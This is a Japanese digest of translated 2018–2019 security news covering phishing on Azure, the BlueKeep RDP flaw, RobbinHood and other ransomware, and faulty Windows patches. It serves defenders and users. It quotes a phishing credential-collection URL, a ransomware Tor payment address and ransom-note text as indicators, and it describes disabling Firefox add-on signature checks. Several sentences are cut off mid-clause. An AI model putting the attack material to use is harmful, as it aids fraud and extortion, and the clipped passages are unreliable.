 "View alert details"リンク(【訳註】この記事の最初の画像の下部)をクリックすると、インチキのMicrosoftアカウントログインページに連れ込まれログインを促される。
フィッシングスカムが連れ込むページ(画像をクリックすると拡大されます)
 このページはAzure(【訳註】オープンで柔軟な、エンタープライズ レベルのクラウド コンピューティング プラットフォーム(Microsoftのページより))をホストしているので、このサイトはMicrosoftによって署名された証明書で保護されている。これにより、Microsoftが認可したURLとして表示されるようになり、スキームに正当性が追加される。 Azureはこの目的のために詐欺師による使用が増大 している。
Microsoftの証明書
 パスワードを入力すると、e-Mailアドレスとパスワードが https://moxxesd.azurewebsites.net/handler.php Webページに送信される。このWebページは攻撃者の制御下にある。詐欺師は、入力された認証を保存し、後にこれらの情報を取得する。
認証を盗むための送信(画像をクリックすると拡大されます)
 連れ込まれたページは、次に犠牲者を正当な https://portal.office.com にリダイレクトするので、再びログインを要請されることになる。
正当なMicrosoftのログインページ(画像をクリックすると拡大されます)
 今まで、我々は常に疑わしいドメインに関してはフィッシング連れ込みぺージか否かを詳細に検討するようにユーザにアドバイスしてきた。フィッシングページをAzure上にホストすることで、連れ込まれるページは、windows.net や azurewebsites.net のようなドメインに配置されているので、多少扱いにくくなっている。
Microsoftからの警告: SIDを削除するとWindows 10は破壊される  Sophos : NakedSecurity (2019/05/22) 警告を発生 させた理由は明らかではないが、認識の欠如がサポートの問題を発生させていることを意味している。拡張された 。
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681
 これが、読み取り専用で「不明なアカウント」として表示されている場所をレジストリ・エディタ(スタート > ファイル名を指定して実行 > regedt32.exe)を使用して徹底的に掘り下げている全ての人々を混乱させている理由を確認するのは簡単である。
 レジストリもしくはファイルシステムパーミッションからケーパビリティSIDSを削除するな。ファイルシステムパーミッションやレジストリパーミッションからケーパビリティSIDSを削除すると、機能やアプリケーションが不正に動作する可能性がある。ケーパビリティSIDSを削除すると、それを戻すためにUIを使用できない。
 更に検索すると、このSIDに関してサポートフォーラムでアドバイスを求めるユーザがいた。正当なものであることに気づかずに、管理者がSIDを削除し、そのことを後悔している例である。
分かり難い名前 
 どれが正当なSIDSで何れが疑わしいSIDSなのかを管理者が解決する方法は?
 設計上、ケーパビリティSIDを分りやすい名前にはしない。
 この答えは、全てのケーパビリティSIDSは、レジストリエントリ(スタート > ファイル名を指定して実行 >  regedt32.exe)中に表示されているので、以下のレジストリエントリを見て回るべきであるということである。
HKEY_LOCAL_MACHINE \ ソフトウェア \ Microsoft \ SecurityManager \ CapabilityClasses \ AllCachedCapabilities
 そのSIDが、このリストに載っていない場合は、それが未だ合法的なサードパーティのケーパビリティであるかもしれないということを念頭に置いて、更なる調査を必要としている。
Windows 10 のKB4494441アップデートはインストールを2回表示する可能性がある  BleepingComputer : News>Security (2019/05/14) 
KB4494441が2回インストールされている(画像をクリックすると拡大されます)
 このアップデートをインストールし、一度だけしかリストされていない場合を含め、これは全てのWindows 10ユーザに影響を与えないことに注目すべきである。KB4494441サポート記事 は、このバグに関連した既知の問題と共にアップデートされている。これを以下に示す。
 一部の顧客は、彼らのデバイスにKB4494441が2回インストールされるとレポートしている。
 特定のシチュエーションで、アップデートをインストールすると、複数のダウンロードと再起動のステップが要求される。このインストレーションの二つの中間ステップが問題なく完了すると、あなたのアップデートの履歴ページの表示は、このインストレーションが2回問題なく完了したことをレポートする。
 あなたに要求されるアクションは何もない。このアップデートのインストレーションは時間が掛かり数回の再起動を要求するかもしれないが、全ての中間インストレーション・ステップが完了した後、無事にインストールされるだろう。
 アップデートの履歴が最新の累積アップデート(LCU)のインストレーションを反映するように、このアップデートを改善するための作業を行っている。
 Microsoftは、この種の問題が発生しないように修正を作業中であると述べている。この修正は、このアップデートのアップデート版か、サービススタック更新プログラムとして提供されるだろう。
KB4494441は重要なアップデートである 
 ユーザは、たとえリストに2回あろうともKB4494441をアンインストールしようとしてはならない。このアップデートは多くのバグフィックスとセキュリティアップデート(最近アナウンスされたMicroarchitectural Data Sampling (MDS)脆弱性 (【訳註】 数日前に報道されたIntel製CPUの脆弱性)を含む)を含んでいる。セキュリティアップデート用の既知のMDSの脆弱性アップデートとアドバイザリ 、緩和策、およびハードウェアデバイスや他の企業のソフトウェア用のアドバイザリのリストも作成している。
Microsoft: 緊急のリモートデスクトップフローを修正、ワームマルウェアをブロック  BleepingComputer : News>Security (2019/05/14) 
 認証されていない攻撃者が RDP を使用して標的のシステムに接続し、特別に細工された要求を送信する場合、リモート デスクトップ サービス (旧称ターミナル サービス) にリモートでコードが実行される脆弱性が存在します。攻撃者がこの脆弱性を悪用した場合、標的のシステムで任意のコードを実行する可能性があります。攻撃者は、その後、プログラムのインストール、データの表示、変更、削除などを行ったり、完全なユーザー権限を持つ新たなアカウントを作成したりする可能性があります。
Windowsの旧バージョンが影響を受ける 
 CVE-2019-0708 として追跡される緊急のRDS脆弱性は、サポート中のWindowsの旧バージョン(即ち、Windows 7, Windows Server 2008 R2, and Windows Server 2008)にのみ影響を与える。影響を受けるバージョンのセキュリティアップデートは、Microsfot Security Update Guide から利用可能であると、Microsoftは発言している。KB4500705 から利用可能なセキュリティアップデートを適用するかの何れかを実行しなさい。
このセキュリティフローは'wormable'(ワームの侵入を許す)ものであり、緩和可能 
 この脆弱性のあるシステムでRemote Desktop Services Connectionsに関してNetwork Level Authentication (NLA)  を有効にすると、「リモートデスクトップ接続を確立してログオン画面が表示される前にユーザー認証を完了することができるため、この脆弱性は部分的に緩和される。これは、悪意あるユーザと悪意あるソフトウェアからリモートコンピュータの保護に役立つ、より安全な認証である。」Simon Popeは、以下のように発言している 。
 この脆弱性は事前認証であり、ユーザの操作を要求しない。換言すれば、この脆弱性は'wormable'(ワームの侵入を許す)である。これは、この脆弱性を攻撃する将来のあらゆるマルウェアが、2017年に世界中に拡散したWannaCryマルウェアに類似した方法で、脆弱性のあるコンピュータから脆弱性のあるコンピュータに拡散できることを意味している。
 これは、身代金要求攻撃、ハッカー、このような'wormable'(ワームの侵入を許す)リモートデスクトップサービスのセキュリティフローのような脅威に晒されるため大変危険であるにも拘わらず、多くのサーバーが遠隔作業者のインターネット接続のためにリモートデスクトップサービスを公にアクセス可能にしているので、とりわけ危険である。
 我々は2019年5月14日に、この脆弱性を解決するためのアップデートをリリースした。旧オペレーティングシステムを使用している顧客は、Windowsの最新バージョンにアップデートするか、あるいは、早急にこのアップデートを適用することを推奨する。詳細な情報は、我々のブログとセキュリティアップデートガイドを参照されたい。」
ユニクロが侵害され46,100アカウントを超えるデータを漏洩  BleepingComputer : News>Security (2019/05/13) 
Internet Watch > ニュース > ユニクロ・GU公式サイトで不正ログイン、身体サイズや氏名・住所など含む46万件の個人情報が閲覧された可能性 
Fast Retailing公式サイト > 「リスト型アカウントハッキング(リスト型攻撃)」による弊社オンラインストアサイトへの不正ログインの発生とパスワード変更のお願いについて 
Firefoxアドオンは証明書の有効期限切れにより無効化された  BleepingComputer : News>Security (2019/05/03) アップデート : Mozillaは、この問題に関する臨時の修正をリリースした。詳細情報は、この記事の末尾を参照。
無効化された拡張(画像をクリックすると拡大されます)
 彼らが無効化されたアドオンをFirefoxのアドオンサイトから再インストールした場合、彼らは「ダウンロードに失敗しました。接続を確認して下さい」のエラーメッセージが表示される。
アドオンインストール時のエラー(画像をクリックすると拡大されます)
 テストしたところ、私は幾つかのアドオンをインストールできなかったが、全てではなかった。これは、有効期限が切れていない別の証明書によってアドオンが署名されていることが原因と考えられる。Bugzillaのバグレポート によると、Mozillaアドオンの署名に使用された中間署名証明書は、協定世界時2019年5月4日の深夜(日本時間5月5日、09:00)に期限切れになった。MozillaアドオンはFirefoxに使用された順番に署名される。コンピュータがその時刻に到達すると、Firefoxは自動的にアドオンを無効化する。
Mozillaバグレポート(画像をクリックすると拡大されます)
 このバグレポートの最新の投稿はKevin Brosnan(Mozillaの上級品質保証技術者)によるものであり、彼らは、この問題を認識しており、問題を調査中であると述べている。
Mozillaは問題を調査中(画像をクリックすると拡大されます)
アドオンを再稼働させるには 
 あなたにとって重要ではないアドオンに関しては、Mozillaが問題を解決し、あなたのアドオンが再稼働するまで待ちなさい。
方法1: コンピュータの時計を数日前に戻す。 
方法2: FirefoxのNightlyビルドかDeveloperビルドをインストールする。 
xpinstall.signatures.required設定(画像をクリックすると拡大されます)
 この設定をFalseにすると、無効化されたアドオンを再使用することができる。
方法3: アドオンのデバッグを有効にする。 提示してくれた 。
 about:debuggingに移動して、addon debuggingチェックボックスをオンにする。その後、必要なアドオンのxpiファイルをロードする。すべての人に有効ではあるが、上記の回避策より遥かに複雑である。
 以下に示すように、「Firefoxに追加」ボタンを右クリックして「名前を付けてリンク先を保存」を選択することで、Firefoxアドオンサイトから直接アドオンをダウンロードすることができる。
アドオン用のXPIファイルをダウンロード(画像をクリックすると拡大されます)
アップデート  米国東部標準時 2019/05/04 午前10:25(日本時間 5月5日 00:25): MozillaはStudiesシステムを介してこの問題に関する臨時の修正をリリースしたと述べている。このシステムは、完全なアップグレードを実行せずにFirefoxに変更の適用を可能にする
Mozillaからの解決策(画像をクリックすると拡大されます)
 Studyシステムを使用するには、以下に示すように、Firefoxのメニューから、編集 > 設定 > プライバシーとセキュリティ > Firefox に調査のインストールと実行を許可する(Firefoxのデータ収集と利用についてセクション)を有効にしておく必要がある(【訳註】Defaultで有効)。
 このアドオンの修正がFirefoxにインストールされている否かを確認するには、about:studiesに進み、実施中の調査リスト、もしくは、完了した調査リスト中に"hotfix-reset-xpi-verification-timestamp-1548973"呼ばれる調査を探す。あなたは、実施中の調査リスト中に、もしくは、完了した調査リスト中にも同様に"hotfix-reset-xpi-verification-timestamp-1548973"と呼ばれる調査を確認するかもしれない。
Studies(調査)中に表示されるホットフィックス
 このホットフィックスがインストールされている場合は、あなたが最早Studies(調査)を受け取ることを希望せず、アドオンが再び動作しているのであれば、Studiesを再び無効化することができる。
MegaLockerとNamPoHyu Virus身代金要求型マルウェア用の復号プログラムがリリースされた  BleepingComputer : News>Security (2019/05/02) Sambaサーバをターゲット にし、遠隔からそのデータを暗号化していることをレポートした。その時点で、ファイルを復号化する方法が見つかるかもしれないので、犠牲者は身代金を支払わないようにと述べた。
MEGALOCKER DECRYPTOR(ダウンロードはこちら から)
 ダウンロードしたら、復号を開始する前に必ずインターネットに接続しておくことが必須である。起動し、脅迫文へ移動し、それを選択する。この復号プログラムは犠牲者の復号キーを復元しようとする。
MegaLocker & NamPoHyu復号プログラム
 キーが発見されると、ファイルを復号するためにこの復号プログラムを無料で使用することができる。
復号されたファイル
 この復号プログラムに関する質問があるのなら、我々のフォーラム中のMegaLocker NamPoHyu Virus Support & Help トピックで自由に質問しなさい。
身代金要求型マルウェアの開発者は不満である 
 我々が身代金を支払わないように犠牲者に告げた時、この開発者は明らかに不満であった。一連の投稿 で、この身代金要求型マルウェアの開発者は、復号プログラムが一週間以内にリリースされなければ、身代金を二倍にすると脅してきた。
NamPoHyu開発者による投稿(画像をクリックすると拡大表示されます)
 この開発者は、イライラを募らせ、我々の支援者を「悪魔」と呼ぶまでに至った。その後、彼らはこの身代金要求型マルウェアに使用されている暗号化アルゴリズムを変更すると脅してきた。
身代金要求型マルウェア開発者によるもう一つの投稿(画像をクリックすると拡大表示されます)
 この開発者が、彼の約束を守るか否か定かでないが、将来のバージョンがリリースされたなら、我々は間違いなく説明する。けれども現在、犠牲者は無料のEmsisoftの復号プログラムを使用してファイルを取り戻すことができる。
Office 365アカウントがBECスカム中に使用されたATO攻撃を介して侵害されていた  BleepingComputer : News>Security (2019/05/02) 
Office 365攻撃方法 
 ATO攻撃を介して彼らのターゲットのアカウントに潜入するために、サイバー犯罪者は「ブランドの偽装、ソーシャルエンジニアリング、フィッシング」を組み合わせて使用している。以前に設定したフィッシング・ランディングページ(【訳註】外部からWebサイトにアクセスした時最初に開くフィッシング用のページ)を訪問させ、彼らのアカウントの資格情報を送信させることを、犠牲者になる可能性のある者に確信させるためにMicrosoftのような有名企業になりすましている。
侵害されたOffice 365アカウントは犯罪者によって乱用されている 
 サイバー犯罪者は、「攻撃を成功させるために、会社の業務方法、使用しているE-mailシグネチャ、金融取引の処理方法を知るために活動を監視し追跡している(他のアカウントへのログイン認証情報の取得を含む)。」2018年度インターネット犯罪レポート で説明されているように、この種のスカムは、背後に凡そ12億ドルの金融損失が存在しており、犯罪者は電信送金をターゲットにし、彼らの制御下にある銀行のアカウントにそれらをリダイレクトさせることに成功している。
 IC3の調査結果は、Proofpointの電子メールセキュリティのRob Holmes副社長によっても確認されている。彼は、「企業が電子メールの成り済まし攻撃の標的とされた頻度は、2018年では2017年との比較で3倍になっており、性能は高度になってきている。世界的な経済的影響に加えて、毎年この種の事件の多くが様々な理由で過少報告または未報告になっていることは注目に値する」と発言している。Barracudaのレポート によれば、ハッカーはまた、「個人情報、財務情報、機密データを盗み取り、個人情報の盗難、詐欺、その他の犯罪にそれを使用することによって攻撃を収益化するために、侵害したアカウントを使用する。
軽減策 
 Barracudaは、電子メールゲートウェイやスパムフィルタをバイパスするように設計された攻撃を検出しブロックすることができる機械学習ベースの防御ソリューションを使用し、「ビジネスメール詐欺とブランド成り済ましを含むスピアフィッシング攻撃に対して」彼らのユーザを保護することを組織にアドバイスしている。
サイバー犯罪者は、仮想通貨を盗むためにハッキングされたMicrosoft E-mailアカウントを使用している  Sophos : Naked Security (2019/05/01) Motherboardは報道 している。今週、攻撃者が彼らの仮想通貨交換口座を改竄し資産を空にするために、彼らのE-mailを使用していたと発言している数人の犠牲者が発見された。Tweakers  technologyフォーラムでの投稿で、Ritmeasterは以下のように発言している:
4月8日、私は仮想通貨の状態を確認したかった。私は毎日Kraken.comを見てはいない、数カ月見ないこともある。
 彼が口座をチェックした時、彼はKrakenパスワードが最早機能しないことを発見した。そして、彼のOutlookの受信箱にメールが一通も存在していないことを見つけた。彼がゴミ箱の中を見た時、パスワードリセットE-mailだけを発見したJefferson1337 は、仮想通貨で凡そ5000$失ったと発言している。TechCrunchに対して認めている 。報道によると、このハッカー達は、E-mailアカウントが企業レベルのものでない限り、あらゆるE-mailアカウントにアクセスできた。shinratechlabs は、以下のように発言している:
 実際に、私がMicrosoftに対して償還請求をするのか? 間違いなく私一人ではない。仮想通貨ユーザは狙われている。
 Naked Securityの読者への結論は、あなたのオンラインアカウントを安全にするためには保護の複数の形態に頼ることがより適切であるということである。
 残念ながら、私はKraken.comで2ファクタ認証をしていなかった。私の口座はすべて、一意の長いパスワードでしっかり保護されていたからである。私は依然として、この行為は正しいと思っているが、今回のMicrosoftの漏洩は内部からのものである。適切なパスワードだったとはいうものの、2ファクタ認証が、あなたの口座を適切に保護する唯一の方法であるということは、高価ではあるが賢明な教訓である。
 特に仮想通貨のユーザへ、もう一つのの結論は、確実な財布とは対照的に仮想通貨の口座を長期間監視せずに資産を放置することは、攻撃に直面する可能性を増加させ、アカウントハックの影響を受けやすくなるということである。
Microsoft EdgeのファイルパーミッションはInternet Explorerと激しく衝突し、XXE攻撃を可能にする  BleepingComputer : News>Security (2019/04/17) John Page によって発見され、3月27日にMicrosoftに通知されている。彼は、彼の発見をサポートする概念の実証を含む詳細を4月10日に公開した。公開 している。
VIDEO 
 この脆弱性攻撃は、Microsoft Edgeブラウザでダウンロードされた特別に細工されたMHTファイル(【訳註】単一のファイルに HTML や画像などのデータがまとめられたファイル(Microsoft Supportより))を、ユーザが開いた時に可能になる。この種のファイルはMHTML Webアーカイブであり、Internet Explorer(IE)がWebページを保存するために使用するDefaultのフォーマットである。IEはまた、Windowsオペレーティング・システムでこれらのファイルを開くDefaultのプログラムである。この問題を解析 し、この問題の源が、Webからダウンロードされるファイルに適用されているWeb(MOTW )フラグのマークを正しく読み取るIEの能力を妨害するEdge中の「マニュアル化されていないセキュリティ機能」に存在すると決定した。0Patchプラットフォーム から利用可能である。このマイクロパッチは、Edgeが、ダウンロードファイル用に設定したWebフラグのマークを、Internet Explorerが正しく解釈できるようにするエラーチェックルーチンを適用する。
VIDEO 
セキュリティ機能間のコンフリクト 
 MOTWは、IEが、ローカルスクリプトやアクティブコンテンツを特権を昇格させて実行する前に、パーミッションを要求するセキュリティ機能である。
・ S-1-15-3-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)
・ S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)
 二つ目のエントリは、IEの低整合性プロセスがファイルのコンテンツもしくは属性への読み込みアクセスを拒否するものである。「我々は、Edgeが、その低整合性サンドボックスでの悪意あるコードの実行に対して、保存されているファイルのセキュリティを更に確固たるものにするためにこの機能を使用していると考えている」とKolsekは発言している。
パッチされたWindowsの0-Dayは、脆弱性のあるシステムの完全なコントロールを提供していた  BleepingComputer : News>Security (2019/04/15) 
5つの特権の昇格フローの一つ 
 これは、Kaspersky Labの研究者達が最近発見した初めてのローカルにおける特権の昇格フローではない。以下が、Microsoftによってここ数ヶ月間にパッチされたローカルの特権の昇格フローである。
 CVE-2019-0859 として追跡されるUse-After-Free(メモリ解放後使用)の脆弱性は、win32k.sysカーネルモードドライバ中に存在し、「コンポーネントがメモリ中のオブジェクトを正しく処理できない」という事実に由来する。Microsoftアドバイザリ は述べている。Kasperskyの研究者によって更に発掘されたこと として、この脆弱性は、犠牲者のシステムへの完全なコントロールを攻撃者が取得するための第三段階のPowerShellベースの脆弱性攻撃手順の一部として「HTTP reverse shell(【訳註】HTTPリダイレクト)を実行する」(バックドアとして知られる)ために、threat actor(【訳註】脅威の動作主体。以下、アクター)によって使用されていた。
最終段階のPowerShellスクリプト(画像をクリックすると拡大します))
バックドアは攻撃者が完全な制御を奪うために埋め込まれる 
 Symantecの2019 Internet Security Threat Report で詳らかにされているように、悪意あるアクターの全体的な傾向がliving-of-the-land(環境寄生【訳註】痕跡を残さないためにマルウェアを利用しない攻撃。資格情報を盗むかハッキングすることで、既存の管理ツールやシステムを利用する攻撃(ScanNetSecurityより))テクニックに移行するに従って、PowerShellスクリプトの悪意ある使用が、顕著な増大を見せている(前年比1000%)。CVE-2019-0803 として追跡される)中に存在していた。
RobbinHood身代金要求型マルウェアは、あなたのプライバシーを保護すると主張している  BleepingComputer : News>Security (2019/04/13) 
RobbinHoodはネットワークをターゲットにしている 
 脅迫文に基づくと、RobbinHoodを操っている攻撃者は、ネットワークへのアクセスの取得を積極的に試みている。彼らがアクセスを取得すると、そのネットワーク上の可能な限りのコンピュータを暗号化しようとする。
 この脅迫文には、犠牲者のファイルに発生したことに関する情報(身代金の額、ユーザが攻撃者にメッセージを残したり、サイズで10MBまでの3つのファイルを無料で復号することのできるTORサイトへのリンク)が含まれている。
http://xbt4titax4pzza6w.onion/
 これらの脅迫文は、犠牲者が単一のコンピュータを復号したいのか、ネットワーク全体を復号したいのかに応じて異なる支払金額を表示している。例えば、BleepingComputerによって確認された脅迫文中には、身代金額は、コンピュータ一台あたり3 Bitcoin、ネットワークに関しては7 Bitcoinとなっている。
RobbinHoodは、あなたのプライバシーを気にかけている 
 この身代金要求型マルウェアのTOR支払いページで、RobbinHoodの開発者は、犠牲者のプライバシーを心配し、支払った後には、その暗号化キーとIPアドレスは削除されると述べている。
 「私が言及したいことは、我々にとってあなたのプライバシーは重要であり、IPアドレスと暗号化キーを含むあなたの記録の全ては、支払いが済み次第削除されるということである。また、あなたが支払うべきBitcoinアドレスは、一意のものであり、それを知る者は誰もいないということである。」
RobbinHoodのTOR支払いサイト)
 更に興味深いのは、この攻撃者達が、彼らの秘密を守るために、このセキュリティ侵害を報告する必要はないと犠牲者に告げていることである。
 「我々のサーバが、あなたのネットワークと情報に関するイベントを些かも持っていないことを言及する必要はない。」
 これは、私が身代金要求型マルウェアがチョットしたアドバイスを提供しているのを確認した最初の出来事である。犠牲者が身代金要求型マルウェアに感染したことを秘密に保持すると述べることによって、彼らは、犠牲になった企業に対して、このセキュリティ侵害を公開されることなく身代金を支払うことができ、悪評を受け取らなくて済むということを仄めかしている。
Greenville市が、RobbinHoodに攻撃されていた 
 RobbinHoodは、ノースカロライナ州グリーンビル市のネットワークに感染することで既にニュースになっている。
グリーンビル市のTweet
 ノースカロライナ州のNews Channel 12 によると、この市は水曜日にRobbinHood身代金要求型マルウェアによって攻撃され、被害の範囲を確定する間ネットワークをシャットダウンした。Tweet したMalwareHunterTeamは、RobbinHoodに感染した犠牲者をモニターしている。MalwareHunterTeamは、この時点で犠牲者の何れも身代金を支払っていないと述べている。
IOC 
関連ファイル名 
_Decryption_ReadMe.html 
脅迫文 
What happened to your files?
1 - We encrypted your files with our "Public key"
Is it possible to get back your data?
OPTION 1
Our Bitcoin address is: xxxxxxxxxxx 
BE CAREFUL, THE COST OF YOUR PAYMENT INCREASES $10,000 EACH DAY AFTER THE FOURTH DAY
Access to the panel ( Contact us )
Alternative addresses
If you're having a problem with using Tor Browser, Ask Google: how to use tor browser 
Microsoftの2019年4月の定例パッチはWindowsにフリーズを発生させる  BleepingComputer : News>Security (2019/04/11) 
・ Sophos Central Endpoint and SEC: Computers fail/hang on boot after the Microsoft Windows April 9, 2019 update (リンクは日本語サイトに変更しています)Windows Machines Running Avast for Business and CloudCare Freezing on Start-up Why does my system run very slow? (From Avira) (リンクは日本語サイトに変更していますが、日本時間、4/12 09:22現在和訳はされていません)
 
 Sophosはサポート記事で、このアップデートがWindowsに起動の失敗を発生させていると述べている。ユーザからのレポートでは、このアップデートプロセスが、Windowsアップデートの構成段階でハングすることも示している。
 「以下のMicrosoft Windowsアップデートをインストールした後、Sophosは、コンピュータが起動できないとするレポートを受け取った。Sophosはこの問題を積極的に調査しており、詳細な情報が利用できるようになり次第、この記事をアップデートする。」
 Sophosは以下のアップデートがコンフリクトを起こすとレポートしている。
・ April 9, 2019 - KB4493467 (Security-only update)  - Windows 8.1, Windows Server 2012 R2April 9, 2019 - KB4493446 (Monthly Rollup)  - Windows 8.1, Windows Server 2012 R2April 9, 2019 - KB4493448 (Security-only update)  - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1April 9, 2019 - KB4493472 (Monthly Rollup)  - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1April 9, 2019 - KB4493450 (Security-only update)  - Windows Server 2012, Windows Embedded 8 StandardApril 9, 2019 - KB4493451 (Monthly Rollup)  - Windows Server 2012, Windows Embedded 8 Standard
 
 Avastは、KB4493472, KB4493448, 並びに、KB4493435 が問題を発生させると指摘している。KB4493435 は、Internet Extlorer用の累積セキュリティアップデートである。KB4493509 、Windows 7用のKB4493472, KB4493448が、Windowsの挙動を通常より緩慢にすると述べている。
 「我々は説明された挙動を再現することができた。これは、今回のWindowsアップデートによって発生している。」
 Microsoftは、この問題を認識しており、影響を与えているアップデートについて、以下の既知の問題をナレッジベースに追加している。更なる問題を防ぐために、Microsoftは、コンフリクトを発生させているアップデートをブロックしたので、解決策が利用可能になるまで、それらはSophos Endpointを稼働しているユーザには提供されない。
概要
 
解決策
 
MicrosoftとSophosは、Sophos CentralまたはSophos Enterprise Console(SEC)の何れかをインストールし管理しているSophos Endpoint Protectionを搭載したデバイスで、このアップデートのインストール後の再起動時にシステムがフリーズまたはハングする原因となる問題を発見した。 
Microsoftは、Sophos Endpointがインストールされている場合、解決策が利用可能になるまで、そのデバイスに対するこのアップデートの配信を一時的にブロックしている。詳細情報に関しては、Sophosのサポート記事 を参照。
 
 現時点で、MicrosoftがAvastやAvira製品とのコンフリクトに言及しておらず、このアップデートが、これらアンチウィルスユーザにも同様にブロックされるか否か不明であることに注意すべきである。
フリーズと無限再起動の解決方法 
 2019年4月の定例アップデートをインストールした後、Windowsが起動に失敗したり、フリーズしたり、アップデートの構成で立ち往生した場合、Windowsが適切に動作するように、このアップデートを削除する必要がある。
・ セーフモードで起動。  
 Avastは、コンピュータをセーフモードでブートし、KB4493472, KB4493448, KB4493435をアンインストールすることを推奨している。
Windows 10も影響を受ける 
 Borncity.comのGunter Born(uはuにウムラウト)もまた、Windows 10も同様に影響を受けるとするレポートが存在すると述べている。 
・ Windows 10 1709: KB4493441  
新しいTajMahalサイバースパイ・キットは、80の悪意あるモジュールを含んでいる  BleepingComputer : News>Security (2019/04/10) 
TajMahal APTフレームワーク(画像をクリックすると拡大します)
 研究者がオンライン上でTajMahalフレームワークを発見した全てのシステムは、TokyoとYokohamaの両方に感染していた。これは、TokyoとYokohamaの両方が感染したコンピュータで機能し続けていることを示唆している。「Tokyoは、関心のある犠牲者に十分な機能を有するYokohamaパッケージを配備するための感染の第一段階で使用され、バックアップ目的のために残されている」と推測されている。TajMahalフレームワーク を検証している間に、Kaspersky Labの研究者によって発見された能力の一部は以下である:
・ プリンタのキューに送信されたドキュメントを盗む能力 
 Kaspersky Labの主任マルウェア アナリストAlexey Shulmin は、「このTajMahalフレームワークは大変関心のある興味をそそるものである。技術的に洗練されていることには疑いの余地がなく、この高度な脅威の動作主体は、我々がこれまで見たことのない機能を特徴としている。 多くの質問が残っている。例えば、このような巨大な投資が、一人の被害者だけに企てられたというのは、ありえないことだろう」と、発言している。
Mira身代金要求型マルウェア復号プログラム  F-Secure : News From The LAB (2019/04/01) 
暗号化プロセス 
 この身代金要求型マルウェアは、キーを生成するためにRfc2898DeriveBytes クラスの新しいインスタンスを初期化する。このクラスは、パスワード、ソルト(【訳註】パスワードを暗号化する際に付与されるデータのこと(日立ソリューションズ・セキュリティ用語解説より))、反復回数を取得する。
 このパスワードは以下の情報を使用して生成される。
・ マシンの名前 
 他方、ソルトは乱数生成器(RNG) によって生成される。
 次に、この身代金要求型マルウェアは、ファイルを暗号化するためにRijndael アルゴリズムの使用を開始する。
 暗号化の後、この身代金要求型マルウェアは、ファイルの末尾に'header'構造体を追加する。
 好都合なことに、このヘッダーは、ソルトとパスワードハッシュを含んでいた。それに加えて。反復回数が、このサンプル中にハードコードされていた(このケースでは、この値は20であった)。
復号ツール 
 復号ツールは、ここからダウンロード することができる。こちらのビデオ を参照されたい。
VIDEO 
vxCrypter: 重複ファイルを削除する最初の身代金要求型マルウェア  BleepingComputer : News>Security (2019/04/01) 
 vxCrypter身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、重複ファイルを削除することによって犠牲者のコンピュータを綺麗に片付ける最初のマルウェア感染である。発見した 。このマルウェアは現段階では開発中である。これは、.NET身代金要求型マルウェアであり、vxLockと呼ばれ完成しなかった古い身代金要求型マルウェアに基づいている。
 私がこの身代金要求型マルウェアを最初にテストした時、以下の画像に示したように、一つを除いてフォルダ中の全てのファイルが削除されていることに気がついた。私は、この身代金要求型マルウェアが未だ開発段階であると認識していたので、暗号化のルーティン中のバグだと思った。
 週末の間、Michael Gillespie は、このランサムウェアが重複したファイルを削除しているので、このファイルの削除は意図的なものであると私に告げた。これは、Gillespieや私が、このような挙動を確認した最初の身代金要求型マルウェアである。
SHA256に基づく削除を示すソースコード
 この身代金要求型マルウェアは、暗号化のターゲットにしている以下のファイル拡張子の重複ファイルだけを削除する。
.txt, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .sqlite, .odt, .jpg, .jpeg, .bmp, .gif, .png, .csv, 
 .exe や .dll のような他のフィルに関しては、重複ファイルは残されたままである。
Adobe ReaderとAcrobatの緊急のセキュリティアップデートがリリースされた  BleepingComputer : News>Security (2018/09/19) Adobeは2018年9月の月例アップデート で6つの緊急のアップデートの修正をリリースした。彼らは一つパッチし損なっていたようである。そこで、Adobeは、今日Adobe AcrobatとAdobe Reader中の緊急の脆弱性を修正するための定例外アップデートをリリースした。APSB18-34 セキュリティブレティンで、このアップデートがコード実行を導くことのできる境界外書き込みの脆弱性をどのように解決するのかを詳細に説明している。他の6つは、情報の漏洩に導く境界外読み取りの脆弱性である。
  
    脆弱性のカテゴリ 脆弱性のインパクト 深刻度 CVE番号  
  
  境界外書き込み 
  	任意のコードの実行 
  	緊急 
  	CVE-2018-12848 
  
    境界外の読み取り 
    情報漏洩 
    重要 
    CVE-2018-12849、CVE-2018-12850 
     
 
 コード実行の脆弱性(CVE-2018-12848)は、Check Point SoftwareによってAdobeに通知された。この情報漏洩の脆弱性は、Check Point Software、Cybellum Technologies LTD、Trend MicroのZero Day Initiativeを介して公開された。ここ で見つけることができる。
CCleanerは設定を無視し、最新バージョン5.46へのアップデートを強制している  BleepingComputer : News>Security (2018/09/17) 報告された のは、9月6日Piriformのフォーラムでのことである。ここで、ユーザ達は、自動アップデートを無効化していた場合でさえ、CCleanerのインストールされているバージョンが、5.46にアップデートされていたと述べている。これは後に、我々のフォーラムへの投稿 で確証された。
BleepingComputer.comへの投稿
 同じPiriformのトピックに於いて、担当者は、「v5.46のリリース以来、我々は、法的要件を満たすためにユーザをこのバージョンにアップデートし、彼らのプライバシー設定により多くの自立性と透明性を提供している」と、その回答で述べている。
Piriformフォーラムへの担当者からの投稿
 実験的に、私はBleepingComputer.comでホストしているCCleaner 5.37 のSlimバージョンをダウンロードしインストールした。
VIDEO 
 これは明らかに、CCleanerがユーザ設定を無視し、新しいバージョンのアップデートを強制しているということが懸念されている。
 「我々は、CCleanerバージョン5.36に重要なアップデート機能を導入した。この重要なアップデートは、セキュリティ上の脅威に対して我々のユーザを保護するために、データの損失や深刻なソフトウェア/ハードウェアのコンフリクトのようなシナリオを回避する目的で重要なソフトウェアアップデートを提供するために設計された。これはCCleaner Professionalが、外すことのできる自動アップデートとは異なっている(自動アップデート機能は、現在CCleaner Free版には搭載されていない)
CCleanerの自動アップデートを無効化する方法 
 CCleanerはユーザの設定を無視し、アップデートのインストールを強制しているので、あなたが、アップデートを無効にしたいのであれば、CCleanerと共にインストールされているCCUpdate.exeと名付けられている実行ファイルを削除する必要がある。
CCleanerアップデート・スケジュール・タスク
